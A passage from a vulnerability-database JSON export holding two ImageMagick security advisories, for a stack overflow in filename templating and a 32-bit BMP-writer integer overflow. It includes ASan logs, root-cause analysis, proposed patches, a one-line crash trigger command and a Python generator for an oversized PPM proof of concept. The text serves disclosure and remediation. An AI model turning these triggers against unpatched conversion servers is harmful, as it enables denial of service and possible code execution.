0x560813499404 in _start (/root/workdir/ImageMagick/utilities/.libs/magick+0x2404)\n\nAddress 0x7ffda834caae is located in stack of thread T0 at offset 62 in frame\n #0 0x7f1ea2c60f62 in ReadImages MagickCore/constitute.c:1027\n\n This frame has 2 object(s):\n [32, 40) 'images' (line 1033)\n [64, 4160) 'read_filename' (line 1029) <== Memory access at offset 62 underflows this variable\nHINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork\n (longjmp and C++ exceptions *are* supported)\nSUMMARY: AddressSanitizer: stack-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1668 in __interceptor_vsnprintf\nShadow bytes around the buggy address:\n 0x100035061900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x100035061910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x100035061920: 00 00 00 00 00 00 00 00 f3 f3 f3 f3 f3 f3 f3 f3\n 0x100035061930: f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00 00 00\n 0x100035061940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n=>0x100035061950: f1 f1 00 f2 f2[f2]00 00 00 00 00 00 00 00 00 00\n 0x100035061960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x100035061970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x100035061980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x100035061990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 0x1000350619a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\nShadow byte legend (one shadow byte represents 8 application bytes):\n Addressable: 00\n Partially addressable: 01 02 03 04 05 06 07 \n Heap left redzone: fa\n Freed heap region: fd\n Stack left redzone: f1\n Stack mid redzone: f2\n Stack right redzone: f3\n Stack after return: f5\n Stack use after scope: f8\n Global redzone: f9\n Global init order: f6\n Poisoned by user: f7\n Container overflow: fc\n Array cookie: ac\n Intra object redzone: bb\n ASan internal: fe\n Left alloca redzone: ca\n Right alloca redzone: cb\n Shadow gap: cc\n==4155==ABORTING\n```\n\n### Affected Code\n\nIn `MagickCore/image.c`, within the `InterpretImageFilename()` function:\n\n```c\nMagickExport size_t InterpretImageFilename(const ImageInfo *image_info,\n Image *image,const char *format,int value,char *filename,\n ExceptionInfo *exception)\n{\n...\n for (p=strchr(format,'%'); p != (char *) NULL; p=strchr(p+1,'%'))\n {\n q=(char *) p+1;\n if (*q == '%')\n {\n p=q+1;\n continue;\n }\n field_width=0;\n if (*q == '0')\n field_width=(ssize_t) strtol(q,&q,10);\n switch (*q)\n {\n case 'd':\n case 'o':\n case 'x':\n {\n q++;\n c=(*q);\n *q='\\0';\n /*--------Affected--------*/\n (void) FormatLocaleString(filename+(p-format-offset),(size_t)\n (MagickPathExtent-(p-format-offset)),p,value);\n offset+=(4-field_width);\n /*--------Affected--------*/\n *q=c;\n (void) ConcatenateMagickString(filename,q,MagickPathExtent);\n canonical=MagickTrue;\n if (*(q-1) != '%')\n break;\n p++;\n break;\n }\n case '[':\n {\n ...\n }\n default:\n break;\n }\n }\n```\n\n## Technical Analysis\n\nThis vulnerability is caused by an inconsistency in the template expansion processing within `InterpretImageFilename()`.\n\nThe format specifiers `%d`, `%o`, and `%x` in templates are replaced with integer values by `FormatLocaleString()`, but the output buffer position is calculated by `filename + (p - format - offset)`.\n\nThe `offset` variable is cumulatively incremented to correct the output length of `%d` etc., but the design using a static `offset += (4 - field_width)` causes `offset` to increase excessively when `%` specifiers are consecutive in the template, creating a dangerous state where the write destination address points before `filename`.\n\nThe constant `4` was likely chosen based on the character count of typical format specifiers like `%03d` (total of 4 characters: `%`, `0`, `3`, `d`). However, in reality, there are formats with only 2 characters like `%d`, and formats with longer width specifications (e.g., `%010d`), so this uniform constant-based correction is inconsistent with actual template structures.\n\nAs a result, when the correction value becomes excessive, `offset` exceeds the relative position `p - format` within the template, generating a negative index. This static and template-independent design of the correction processing is the root cause of this vulnerability.\n\nThis causes `vsnprintf()` to write outside the stack buffer range, which is detected by AddressSanitizer as a `stack-buffer-overflow`.\n\n## Proposed Fix\n\nIn `MagickCore/image.c`, within the `InterpretImageFilename()` function:\n\n```c\nMagickExport size_t InterpretImageFilename(const ImageInfo *image_info,\n Image *image,const char *format,int value,char *filename,\n ExceptionInfo *exception)\n{\n...\n /*--------Changed--------*/\n ssize_t\n field_width,\n offset,\n written; // Added\n /*--------Changed--------*/\n...\n for (p=strchr(format,'%'); p != (char *) NULL; p=strchr(p+1,'%'))\n {\n q=(char *) p+1;\n if (*q == '%')\n {\n p=q+1;\n continue;\n }\n field_width=0;\n if (*q == '0')\n field_width=(ssize_t) strtol(q,&q,10);\n switch (*q)\n {\n case 'd':\n case 'o':\n case 'x':\n {\n q++;\n c=(*q);\n *q='\\0';\n written = FormatLocaleString(filename+(p-format-offset),(size_t)\n (MagickPathExtent-(p-format-offset)),p,value);\n /*--------Changed--------*/\n if (written <= 0 || written > (MagickPathExtent - (p - format - offset)))\n return 0;\n offset += (ssize_t)((q - p) - written);\n /*--------Changed--------*/\n *q=c;\n (void) ConcatenateMagickString(filename,q,MagickPathExtent);\n canonical=MagickTrue;\n if (*(q-1) != '%')\n break;\n p++;\n break;\n }\n case '[':\n {\n ...\n }\n default:\n break;\n }\n }\n```\n- By updating `offset` based on the difference between template description length `(q - p)` and the number of output bytes `written`, buffer position consistency is maintained.\n- Correction is performed according to the actual template structure, ensuring stable behavior regardless of format length without relying on static constants.\n- Range checking of `written` allows detection of vsnprintf failures and excessive writes.\n\n### Commits\nFixed in https://github.com/ImageMagick/ImageMagick/commit/66dc8f51c11b0ae1f1cdeacd381c3e9a4de69774 and https://github.com/ImageMagick/ImageMagick6/commit/643deeb60803488373cd4799b24d5786af90972e", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-53101.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-53101.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53101", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.28213", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.28113", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.28046", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00102", "scoring_system": "epss", "scoring_elements": "0.28256", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00114", "scoring_system": "epss", "scoring_elements": "0.30023", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00114", "scoring_system": "epss", "scoring_elements": "0.30067", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00114", "scoring_system": "epss", "scoring_elements": "0.30063", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00114", "scoring_system": "epss", "scoring_elements": "0.29923", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00114", "scoring_system": "epss", "scoring_elements": "0.29968", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00114", "scoring_system": "epss", "scoring_elements": "0.29989", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00114", "scoring_system": "epss", "scoring_elements": "0.29973", "published_at": "2026-04-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53101" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-53101", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-53101" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.7.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.7.0" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick6/commit/643deeb60803488373cd4799b24d5786af90972e", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/643deeb60803488373cd4799b24d5786af90972e" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/66dc8f51c11b0ae1f1cdeacd381c3e9a4de69774", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:27:44Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/66dc8f51c11b0ae1f1cdeacd381c3e9a4de69774" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-qh3h-j545-h8c9", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:27:44Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-qh3h-j545-h8c9" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53101", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53101" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1109339", "reference_id": "1109339", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1109339" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2379947", "reference_id": "2379947", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2379947" }, { "reference_url": "https://github.com/advisories/GHSA-qh3h-j545-h8c9", "reference_id": "GHSA-qh3h-j545-h8c9", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qh3h-j545-h8c9" }, { "reference_url": "https://usn.ubuntu.com/7728-1/", "reference_id": "USN-7728-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7728-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/418443?format=api", "purl": "pkg:apk/alpine/imagemagick@7.1.2.8-r0?arch=aarch64&distroversion=v3.23&reponame=community", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/imagemagick@7.1.2.8-r0%3Farch=aarch64&distroversion=v3.23&reponame=community" } ], "aliases": [ "CVE-2025-53101", "GHSA-qh3h-j545-h8c9" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9ewm-6688-kkar" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/28988?format=api", "vulnerability_id": "VCID-f6pf-5jnz-fkd1", "summary": "ImageMagick (WriteBMPImage): 32-bit integer overflow when writing BMP scanline stride → heap buffer overflow\n## Summary\n\nA 32-bit integer overflow in the BMP encoder’s scanline-stride computation collapses `bytes_per_line` (stride) to a tiny value while the per-row writer still emits `3 × width` bytes for 24-bpp images. The row base pointer advances using the (overflowed) stride, so the first row immediately writes past its slot and into adjacent heap memory with attacker-controlled bytes. This is a classic, powerful primitive for heap corruption in common auto-convert pipelines.\n\n- **Impact:** Attacker-controlled heap out-of-bounds (OOB) write during conversion **to BMP**.\n \n- **Surface:** Typical upload → normalize/thumbnail → `magick ... out.bmp` workers.\n \n- **32-bit:** **Vulnerable** (reproduced with ASan).\n \n- **64-bit:** Safe from this specific integer overflow (IOF) by arithmetic, but still add product/size guards.\n \n- **Proposed severity:** **Critical 9.8** (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n \n\n---\n\n## Scope & Affected Builds\n\n- **Project:** ImageMagick (BMP writer path, `WriteBMPImage` in `coders/bmp.c`).\n \n- **Commit under test:** `3fcd081c0278427fc0e8ac40ef75c0a1537792f7`\n \n- **Version string from the run:** `ImageMagick 7.1.2-0 Q8 i686 9bde76f1d:20250712`\n \n- **Architecture:** 32-bit i686 (**`sizeof(size_t) == 4`**) with ASan/UBSan.\n \n- **Note on other versions:** Any release/branch with the same stride arithmetic and row loop is likely affected on 32-bit.\n \n\n---\n\n## Root Cause (with code anchors)\n\n### Stride computation (writer)\n\n```c\nbytes_per_line = 4 * ((image->columns * bmp_info.bits_per_pixel + 31) / 32);\n```\n\n### Per-row base and 24-bpp loop (writer)\n\n```c\nq = pixels + ((ssize_t)image->rows - y - 1) * (ssize_t)bytes_per_line;\nfor (x = 0; x < (ssize_t)image->columns; x++) {\n *q++ = B(...); *q++ = G(...); *q++ = R(...); // writes 3 * width bytes\n}\n```\n\n### Allocation (writer)\n\n```c\npixel_info = AcquireVirtualMemory(image->rows,\n MagickMax(bytes_per_line, image->columns + 256UL) * sizeof(*pixels));\npixels = (unsigned char *) GetVirtualMemoryBlob(pixel_info);\n```\n\n### Dimension “caps” (insufficient)\n\nThe writer rejects dimensions that don’t round-trip through `signed int`, but both overflow thresholds below are **≤ INT_MAX** on 32-bit, so the caps **do not prevent** the bug.\n\n---\n\n## Integer-Overflow Analysis (32-bit `size_t`)\n\nStride formula for 24-bpp:\n\n```\nbytes_per_line = 4 * ((width * 24 + 31) / 32)\n```\n\nThere are **two independent overflow hazards** on 32-bit:\n\n1. **Stage-1 multiply+add** in `(width * 24 + 31)` \n Overflow iff `width > ⌊(0xFFFFFFFF − 31) / 24⌋ = 178,956,969` \n → at **width ≥ 178,956,970** the numerator wraps small before `/32`, producing a **tiny** `bytes_per_line`.\n \n2. **Stage-2 final ×4** after the division \n Let `q = (width * 24 + 31) / 32`. Final `×4` overflows iff `q > 0x3FFFFFFF`. \n Solving gives **width ≥ 1,431,655,765 (0x55555555)**.\n \n\nBoth thresholds are **below** `INT_MAX` (≈2.147e9), so “int caps” don’t help.\n\n**Mismatch predicate (guaranteed OOB when overflowed):** \nPer-row write for 24-bpp is `row_bytes = 3*width`. Safety requires `row_bytes ≤ bytes_per_line`. \nUnder either overflow, `bytes_per_line` collapses → `3*width > bytes_per_line` holds → **OOB-write**.\n\n---\n\n## Concrete Demonstration\n\nChosen width: **`W = 178,957,200`** (just over Stage-1 bound)\n\n- Stage-1: `24*W + 31 = 4,294,972,831 ≡ 0x0000159F (mod 2^32)` → **5535**\n \n- Divide by 32: `5535 / 32 = 172`\n \n- Multiply by 4: `bytes_per_line = 172 * 4 = **688** bytes` ← tiny stride\n \n- Per-row data (24-bpp): `row_bytes = 3*W = **536,871,600** bytes`\n \n- Allocation used: `MagickMax(688, W+256) = **178,957,456** bytes`\n \n- **Immediate OOB**: first row writes ~536MB into a 178MB region, starting at a base advanced by only 688 bytes.\n \n---\n\n## Observed Result (ASan excerpt)\n\n```\nERROR: AddressSanitizer: heap-buffer-overflow on address 0x6eaac490\nWRITE of size 1 in WriteBMPImage coders/bmp.c:2309\n...\nallocated by:\n AcquireVirtualMemory MagickCore/memory.c:747\n WriteBMPImage coders/bmp.c:2092\n```\n\n- Binary: **ELF 32-bit i386**, Q8, non-HDRI\n \n- Resources set to permit execution of the writer path (defense-in-depth limits relaxed for repro)\n \n\n---\n\n## Exploitability & Risk\n\n- **Primitive:** Large, contiguous, attacker-controlled heap overwrite beginning at the scanline slot.\n \n- **Control:** Overwrite bytes are sourced from attacker-supplied pixels (e.g., crafted input image to be converted to BMP).\n \n- **Likely deployment:** Server-side, non-interactive conversion pipelines (UI:N).\n \n- **Outcome:** At minimum, deterministic crash (DoS). On many 32-bit allocators, well-understood heap shaping can escalate to **RCE**.\n \n\n**Note on 64-bit:** Without integer overflow, `bytes_per_line = 4 * ceil((3*width)/4) ≥ 3*width`, so the mismatch doesn’t arise. Still add product/size checks to prevent DoS and future refactors.\n\n---\n\n## Reproduction (copy-paste triager script)\n\n**Test Environment:**\n\n- `docker run -it --rm --platform linux/386 debian:11 bash`\n \n- Install deps: `apt-get update && apt-get install -y build-essential git autoconf automake libtool pkg-config python3`\n \n- Clone & checkout: ImageMagick `7.1.2-0` → commit `3fcd081c0278427f...`\n \n- Configure 32-bit Q8 non-HDRI with ASan/UBSan (summary):\n\n```bash\n./configure \\\n --host=i686-pc-linux-gnu \\\n --build=x86_64-pc-linux-gnu \\\n --disable-dependency-tracking \\\n --disable-silent-rules \\\n --disable-shared \\\n --disable-openmp \\\n --disable-docs \\\n --without-x \\\n --without-perl \\\n --without-magick-plus-plus \\\n --without-lqr \\\n --without-zstd \\\n --without-tiff \\\n --with-quantum-depth=8 \\\n --disable-hdri \\\n CFLAGS=\"-O1 -g -fno-omit-frame-pointer -fsanitize=address,undefined\" \\\n CXXFLAGS=\"-O1 -g -fno-omit-frame-pointer -fsanitize=address,undefined\" \\\n LDFLAGS=\"-fsanitize=address,undefined\"\n\nmake -j\"$(nproc)\"\n```\n- Runtime limits to exercise writer:\n\n```bash\nexport MAGICK_WIDTH_LIMIT=200000000\nexport MAGICK_HEIGHT_LIMIT=200000000\nexport MAGICK_TEMPORARY_PATH=/tmp\nexport TMPDIR=/tmp\nexport ASAN_OPTIONS=\"detect_leaks=0:malloc_context_size=20:alloc_dealloc_mismatch=0\"\n```\n\n**One-liner trigger (no input file):**\n\n```bash\nW=178957200\n./utilities/magick \\\n -limit width 200000000 -limit height 200000000 \\\n -limit memory 268435456 -limit map 0 -limit disk 200000000000 \\\n -limit thread 1 \\\n -size ${W}x1 xc:black -type TrueColor -define bmp:format=bmp3 BMP3:/dev/null\n```\n\n**Expected:** ASan heap-buffer-overflow in `WriteBMPImage` (will be provided in a private gist link).\n\n**Alternate PoC (raw PPM generator):**\n\n```python\n#!/usr/bin/env python3\nW, H, MAXV = 180_000_000, 1, 255 \n# W > 178,956,969\nwith open(\"huge.ppm\", \"wb\") as f:\n f.write(f\"P6\\n{W} {H}\\n{MAXV}\\n\".encode(\"ascii\"))\n chunk = (b\"\\x41\\x42\\x43\") * (1024*1024)\n remaining = 3 * W\n while remaining:\n n = min(remaining, len(chunk))\n f.write(chunk[:n]); remaining -= n\n# Then: magick huge.ppm out.bmp\n```\n\n---\n\n## Proposed Severity\n\n- **Primary vector (server auto-convert):** `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` → **9.8 Critical**\n \n- **If strictly CLI/manual conversion:** `UI:R` → **8.8 High**\n \n\n---\n\n## Maintainer Pushbacks — Pre-empted\n\n- **“MagickMax makes allocation large.”** The row **base** advances by **overflowed `bytes_per_line`**, causing row overlap and eventual region exit regardless of total allocation size.\n \n- **“We’re 64-bit only.”** Code is still incorrect for 32-bit consumers/cross-compiles; also add product guards on 64-bit for correctness/DoS.\n \n- **“Resource policy blocks large images.”** That’s environment-dependent defense-in-depth; arithmetic must be correct.\n \n---\n\n## Remediation (Summary)\n\nAdd checked arithmetic around stride computation and enforce a per-row invariant so that the number of bytes emitted per row (row_bytes) always fits within the computed stride (bytes_per_line). Guard multiplication/addition and product computations used for header fields and allocation sizes, and fail early with a clear WidthOrHeightExceedsLimit/ResourceLimitError when values exceed safe bounds.\n\nConcretely:\n\n- Validate width and bits_per_pixel before the stride formula to ensure (width*bpp + 31) cannot overflow a size_t.\n- Compute row_bytes for the chosen bpp and assert row_bytes <= bytes_per_line.\n- Bound rows * stride before allocating and ensure biSizeImage (DIB 32-bit) cannot overflow.\n\nA full suggested guarded implementation is provided in Appendix A — Full patch (for maintainers).\n\n---\n\n## Regression Tests to Include (PR-friendly)\n\n1. **32-bit overflow repros** (with ASan):\n \n - `rows=1`, `width ≥ 178,956,970`, `bpp=24` → now cleanly errors.\n \n - `rows=2`, same bound → no row overlap; clean error.\n \n2. **64-bit sanity:** Medium images (e.g., `8192×4096`, 24-bpp) round-trip; header’s `biSizeImage = rows * bytes_per_line`.\n \n3. **Packed bpp (1/4/8):** Validate `row_bytes = (width*bpp+7)/8` (guarded), 4-pad, and **payload ≤ stride** holds.\n\n---\n\n## Attachments (private BMP_Package) \nProvided with report: README.md, poc_ppm_generator.py, repro_commands.sh, full_asan_bmp_crash.txt, appendix_a_patch_block.c. (Private gist link with package provided separately.)\n\n---\n\n## Disclosure & Coordination\n\n- **Reporter:** Lumina Mescuwa\n \n- **Tested on:** i686 Linux container (details in Repro)\n \n- **Timeline:** August 19th, 2025\n \n\n---\n\n## Appendices\n\n### Appendix A — Patch block tailored to `bmp.c`\n\n**Where this hooks in (current code):**\n\n- Stride is computed here: `bytes_per_line=4*((image->columns*bmp_info.bits_per_pixel+31)/32);`\n \n- Header uses `bmp_info.image_size=(unsigned int) (bytes_per_line*image->rows);`\n \n- Allocation uses `AcquireVirtualMemory(image->rows, MagickMax(bytes_per_line, image->columns+256UL)*sizeof(*pixels));`\n \n- 24-bpp row loop writes pixels then zero-pads up to `bytes_per_line` (so the per-row slot size matters): `for (x=3L*(ssize_t)image->columns; x < (ssize_t)bytes_per_line; x++) *q++=0x00;`\n \n\n---\n\n## Suggested Patch (minimal surface, guards + invariant)\n\nI recommend this **in place of** the existing `bytes_per_line` assignment and the subsequent `bmp_info.image_size` / allocation block. Keep your macros and local variables as-is.\n\n```c\n/* --- PATCH BEGIN: guarded stride, per-row invariant, and product checks --- */\n\n/* 1) Guard the original stride arithmetic (preserve behavior, add checks). */\nif (bmp_info.bits_per_pixel == 0 ||\n (size_t)image->columns > (SIZE_MAX - 31) / (size_t)bmp_info.bits_per_pixel)\n ThrowWriterException(ImageError, \"WidthOrHeightExceedsLimit\");\n\nsize_t _tmp = (size_t)image->columns * (size_t)bmp_info.bits_per_pixel + 31;\n/* Divide first; then check the final ×4 won't overflow. */\n_tmp /= 32;\nif (_tmp > (SIZE_MAX / 4))\n ThrowWriterException(ImageError, \"WidthOrHeightExceedsLimit\");\n\nbytes_per_line = 4 * _tmp; /* same formula as before, now checked */\n\n/* 2) Compute the actual data bytes written per row for the chosen bpp. */\nsize_t row_bytes;\nif (bmp_info.bits_per_pixel == 1 || bmp_info.bits_per_pixel == 4 || bmp_info.bits_per_pixel == 8) {\n /* packed: ceil(width*bpp/8) */\n if ((size_t)image->columns > (SIZE_MAX - 7) / (size_t)bmp_info.bits_per_pixel)\n ThrowWriterException(ImageError, \"WidthOrHeightExceedsLimit\");\n row_bytes = (((size_t)image->columns * (size_t)bmp_info.bits_per_pixel) + 7) >> 3;\n} else {\n /* 16/24/32 bpp: (bpp/8) * width */\n size_t bpp_bytes = (size_t)bmp_info.bits_per_pixel / 8;\n if (bpp_bytes == 0 || (size_t)image->columns > SIZE_MAX / bpp_bytes)\n ThrowWriterException(ImageError, \"WidthOrHeightExceedsLimit\");\n row_bytes = bpp_bytes * (size_t)image->columns;\n}\n\n/* 3) Per-row safety invariant: the payload must fit the stride. */\nif (row_bytes > bytes_per_line)\n ThrowWriterException(ResourceLimitError, \"MemoryAllocationFailed\");\n\n/* 4) Guard header size and allocation products. */\nif ((size_t)image->rows == 0)\n ThrowWriterException(ImageError, \"WidthOrHeightExceedsLimit\");\n\n/* biSizeImage = rows * bytes_per_line (DIB field is 32-bit) */\nif (bytes_per_line > 0xFFFFFFFFu / (size_t)image->rows)\n ThrowWriterException(ImageError, \"WidthOrHeightExceedsLimit\");\nbmp_info.image_size = (unsigned int)(bytes_per_line * (size_t)image->rows);\n\n/* Allocation count = rows * stride_used, with existing MagickMax policy. */\nsize_t _stride = MagickMax(bytes_per_line, (size_t)image->columns + 256UL);\nif (_stride > SIZE_MAX / (size_t)image->rows)\n ThrowWriterException(ResourceLimitError, \"MemoryAllocationFailed\");\n\npixel_info = AcquireVirtualMemory((size_t)image->rows, _stride * sizeof(*pixels));\nif (pixel_info == (MemoryInfo *) NULL)\n ThrowWriterException(ResourceLimitError, \"MemoryAllocationFailed\");\npixels = (unsigned char *) GetVirtualMemoryBlob(pixel_info);\n\n/* Optional: keep zeroing aligned to computed header size. */\n(void) memset(pixels, 0, (size_t) bmp_info.image_size);\n\n/* --- PATCH END --- */\n```\n\n### Why this is the right spot?\n\n- It **replaces** the unguarded stride line you currently have, without changing the algorithm (still `4*((W*bpp+31)/32)`). \n \n- It **fixes the header** (`biSizeImage`) to be a checked product, instead of a potentially wrapped multiplication. \n \n- It **guards allocation** where you presently allocate `rows × MagickMax(bytes_per_line, columns+256)`. \n \n- The invariant `row_bytes ≤ bytes_per_line` ensures your 24-bpp emission loop (writes 3 bytes/pixel, then pads to `bytes_per_line`) can never exceed the per-row slot the code relies on. \n \n\n---\n\n## Notes\n\n- **Behavior preserved**: The stride value for normal images is unchanged; only pathological integer states are rejected. \n \n- **Header consistency**: `biSizeImage = rows * bytes_per_line` remains true by construction, but now cannot overflow a 32-bit DIB field. \n \n- **Defensive alignment**: If you prefer, you can compute `bytes_per_line` as `((row_bytes + 3) & ~3U)`; it’s equivalent and may read clearer, but I kept the original formula with guards to minimize diff.\n \n\nA slightly larger “helpers” variant (with `safe_mul_size` / `safe_add_size` utilities) also comes to mind, but the block above is the tightest patch that closes the 32-bit IOF→OOB class without touching unrelated code paths.\n\n\n\n### Appendix B — Arithmetic Worked Example (W=178,957,200)\n\n- `(24W + 31) mod 2^32 = 5535`\n \n- `bytes_per_line = 4 * (5535/32) = 688`\n \n- `row_bytes (24-bpp) = 536,871,600`\n \n- Allocation via `MagickMax = 178,957,456` → immediate row 0 out-of-bounds.\n \n\n### Appendix C — Raw ASan Log (trimmed)\n\n```\n=================================================================\n==49178==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6eaac490\nWRITE of size 1 at 0x6eaac490 thread T0\n #0 0xed2788 in WriteBMPImage coders/bmp.c:2309\n #1 0x13da32c in WriteImage MagickCore/constitute.c:1342\n #2 0x13dc657 in WriteImages MagickCore/constitute.c:1564\n0x6eaac490 is located 0 bytes to the right of 178957456-byte region\nallocated by thread T0 here:\n #0 0x408e30ab in __interceptor_posix_memalign\n #1 0xd03305 in AcquireVirtualMemory MagickCore/memory.c:747\n #2 0xecd597 in WriteBMPImage coders/bmp.c:2092\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-57803.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-57803.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-57803", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.24279", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.24095", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.24152", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.24194", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", "scoring_elements": "0.24176", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00082", "scoring_system": "epss", 